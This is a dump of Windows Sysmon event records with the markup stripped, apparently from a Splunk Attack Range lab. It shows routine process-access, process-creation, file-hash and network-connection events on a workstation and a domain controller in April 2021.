14:55:58.512{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7E-607E-E006-00000000BB01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049916Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-EB7E-607E-E006-00000000BB01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049915Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.465{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=103660F5456EC9E97B59C34C2A34FA0D,SHA256=B44B779F689E123EC93D3A85CB245F7655E403F6002320E7D5AB15AA3D500EDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049914Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.199{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2DA782C1E0CD5D992AA43EF902346D9,SHA256=44D3D79514761CE2AD51E8EF318A65490A9E13F817F0DDBF494D7B221800BE49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.891{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI8365.tmpMD5=9CADBFA797783FF9E7FC60301DE9E1FF,SHA256=C1EDA5C42BE64CFC08408A276340C9082F424EC1A4E96E78F85E9F80D0634141,IMPHASH=652859BF844DA7396CCD2DCBC07B8FD2truetrue 10341000x800000000000000072335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.891{A7A01FEF-EB7F-607E-9D0B-00000000BB01}5076832c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|c:\Windows\syswow64\MsiExec.exe+7291|c:\Windows\syswow64\MsiExec.exe+7873|c:\Windows\syswow64\MsiExec.exe+9201|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000072334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.844{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7F-607E-9D0B-00000000BB01}5076c:\Windows\syswow64\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000072333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.973{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4195-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.324{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57513-false184.24.22.173a184-24-22-173.deploy.static.akamaitechnologies.com80http 354300x800000000000000072331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.295{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57512-false20.54.64.202-80http 354300x800000000000000072330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.242{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local64028- 354300x800000000000000072329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.238{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57511-false184.24.22.173a184-24-22-173.deploy.static.akamaitechnologies.com80http 10341000x800000000000000072328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7F-607E-9D0B-00000000BB01}5076c:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14005220C:\Windows\system32\msiexec.exe{A7A01FEF-EB7F-607E-9D0B-00000000BB01}5076c:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.328{A7A01FEF-EB7F-607E-9D0B-00000000BB01}5076C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\Windows\syswow64\MsiExec.exe -Embedding DCD105F68CD1661C83267EC931599E8B E Global\MSI0000C:\Windows\SysWOW64\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 10341000x800000000000000072321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.297{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.297{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14003296C:\Windows\system32\msiexec.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+dffc7|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BBCA5C7BC67E48C1B2E21276D044551A,SHA256=96F00CCE8DF8F388AC5197C14C0F68E930EA112623E9785475FA16D465D43781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62417D3C5C7C07B1DEC9A392C15B3732,SHA256=73346FE6B9CA85F9FF5EDDD7A8A4B20E5B85E5EC51D0938C6A07BA9CD408EE12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=605FCD8F318AC212A8F35FC17649A2B1,SHA256=C3934456C9547B2BB60124647AC9D1D92F5290277D75FE473817B815BEDEFB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.204{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C6E9ACD969374FFC2750925E64D66FC6,SHA256=4BB191B80A2750F6DF7D8310F8C927FDB78B02A918DC8E9AB7887CB7D3592137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.110{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0828a.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.063{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.063{A7A01FEF-B624-607E-0A00-00000000BB01}8525304C:\Windows\system32\services.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 